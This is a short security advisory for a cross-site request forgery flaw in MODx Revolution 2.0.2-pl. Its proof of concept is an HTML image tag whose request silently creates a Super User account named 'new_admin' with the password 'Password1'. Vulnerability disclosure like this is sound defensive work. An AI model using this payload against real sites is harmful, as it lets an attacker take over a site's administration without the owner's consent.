Home
Consulting
Advisories
Software
Articles
Contact

MODx Revolution 2.0.2-pl Cross-site Request Forgery

Legacy Advisories

Description

A cross-site request forgery vulnerability in MODx Revolution 2.0.2-pl can be exploited to create a new admin.

Proof Of Concept

<html>
    <body>
        <img src="http://localhost/modx/connectors/security/user.php?action=create&modx-ab-stay=&groups=%5B%7B%22usergroup%22%3A%221%22%2C%22role%22%3A%222%22%2C%22member%22%3A%22%22%2C%22rolename%22%3A%22Super%20User%22%2C%22name%22%3A%22Administrator%22%2C%22menu%22%3Anull%7D%5D&extended=%7B%7D&HTTP_MODAUTH=modx4ca298fc3d92e9.21874888&id=0&newpassword=false&modx-user-fs-newpassword-checkbox=on&passwordnotifymethod=s&passwordgenmethod=spec&specifiedpassword=Password1&confirmpassword=Password1&username=new_admin&active=1&fullname=&email=x%40x.com&phone=&mobilephone=&address=&city=&fax=&state=&zip=&country=&website=&dob=&gender=&comment=&failedlogincount=&blockeduntil=&blockedafter=&extended_name=&extended_value=&extended_id=" />
    </body>
</html>


Copyright © 2018 AutoSec Tools LLC